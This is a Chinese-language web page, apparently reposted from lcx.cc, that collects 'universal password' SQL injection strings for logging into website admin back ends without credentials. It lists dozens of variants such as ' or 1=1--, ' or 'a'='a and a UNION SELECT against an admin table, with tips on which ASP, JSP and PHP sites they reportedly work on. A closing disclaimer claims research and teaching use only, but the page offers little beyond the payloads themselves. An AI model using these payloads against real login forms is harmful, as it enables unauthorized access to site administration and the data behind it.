各种利用形式如下:
'or'='or' 'or''=' 'or ''=' " or "a"="a "or "a"="a "or 1=1-- "or 1=1%00 "or"="a'='a "or=or" ') or ('a'='a ')or('a'='a 1 or '1'='1' or 1=1 1 or '1'='1'=1 1'or'1'='1 admin' or 'a'='a 密码随便 admin'or'1'='1'-- admin' or '1'='1'-- a'or' 1=1-- a 'or' 1=1-- or 1=1-- 'or 1=1-- 'or' '1'='1 or 1=1-- ' 'OR 1=1%00 or 'a'='a 'or'='1' 'or''=''or''=' ' or ''=''or''=' 'or'1'='1 ' or '1'='1 'or'a'='a ' or 'a'='a 'xor 用户名: ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)密码: 1
特殊说明:
1.admin ' or ' membership/login.asp(国外某程序)
2.admin 1'or'1'='1 用于jsp程序,如果管理员有admin这个用户,有一定成功率。
3.存在字符型注入的php网站是可以用万能密码' or 1=1/*的(某文章提到过)
欢迎各位补充以及提出意见
留言评论(旧系统):
文章来源于lcx.cc:网站后台“万能密码” 'or'='or' 的总结
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论